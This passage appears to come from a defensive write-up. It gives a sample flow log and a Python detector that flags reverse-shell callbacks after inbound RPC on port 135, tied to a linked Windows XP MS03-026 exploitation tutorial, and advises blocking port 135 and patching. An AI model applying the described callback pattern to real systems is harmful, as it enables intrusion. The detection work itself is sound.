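2012-04-20T10:15:02 TCP 10.0.0.6:49512 -> 10.0.0.3:135
2012-04-20T10:15:04 TCP 10.0.0.3:1042 -> 10.0.0.6:4444
2012-04-20T10:15:30 TCP 10.0.0.3:1043 -> 10.0.0.20:80
2012-04-20T10:40:00 TCP 10.0.0.3:1050 -> 10.0.0.10:445
garbled line that the parser must skip
2012-04-20T11:00:00 TCP 10.0.0.7:40000 -> 10.0.0.5:135
2012-04-20T11:00:03 UDP 10.0.0.5:1030 -> 10.0.0.7:53
"""

Flow = namedtuple("Flow", "ts proto src sport dst dport")

LINE_RE = re.compile(
    r"^(\S+) (TCP|UDP) (\d{1,3}(?:\.\d{1,3}){3}):(\d+) -> "
    r"(\d{1,3}(?:\.\d{1,3}){3}):(\d+)$"
)


def parse_line(line):
    """Return a Flow for a well-formed log line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    try:
        ts = datetime.fromisoformat(m.group(1))
    except ValueError:
        return None
    return Flow(ts, m.group(2), m.group(3), int(m.group(4)),
                m.group(5), int(m.group(6)))


def find_rpc_callbacks(lines, window=timedelta(seconds=60)):
    """Flag hosts that receive a TCP/135 connection and then open a TCP
    connection back to the same peer within `window`."""
    flows = [f for f in map(parse_line, lines) if f is not None]
    flows.sort(key=lambda f: f.ts)  # stable sort keeps log order on ties

    last_rpc = {}  # (rpc_server, rpc_client) -> time of latest inbound RPC
    alerts = []
    for f in flows:
        if f.proto != "TCP":
            continue  # the payload in the tutorial is a reverse TCP shell
        if f.dport == RPC_PORT:
            last_rpc[(f.dst, f.src)] = f.ts
            continue
        rpc_ts = last_rpc.get((f.src, f.dst))
        if rpc_ts is not None and f.ts - rpc_ts <= window:
            alerts.append({
                "target": f.src,          # host that received the RPC call
                "peer": f.dst,            # host it then connected back to
                "callback_port": f.dport,
                "rpc_time": rpc_ts,
                "delay": f.ts - rpc_ts,
            })
    return alerts


if __name__ == "__main__":
    for a in find_rpc_callbacks(SAMPLE_LOG.splitlines()):
        print("ALERT: {target} called back to {peer}:{callback_port} "
              "{delay} after inbound RPC".format(**a))
```

On hosts that still expose RPC, the same rule pairs naturally with blocking inbound port 135 at the perimeter and applying the MS03-026 patch the tutorial names.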

Read more: http://null-byte.wonderhowto.com/blog/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp-0134709/#ixzz1t2aFUR2x

Source: http://www.businessinsider.com/hack-like-a-pro-how-to-exploit-and-gain-remote-access-to-pcs-running-windows-xp-2012-4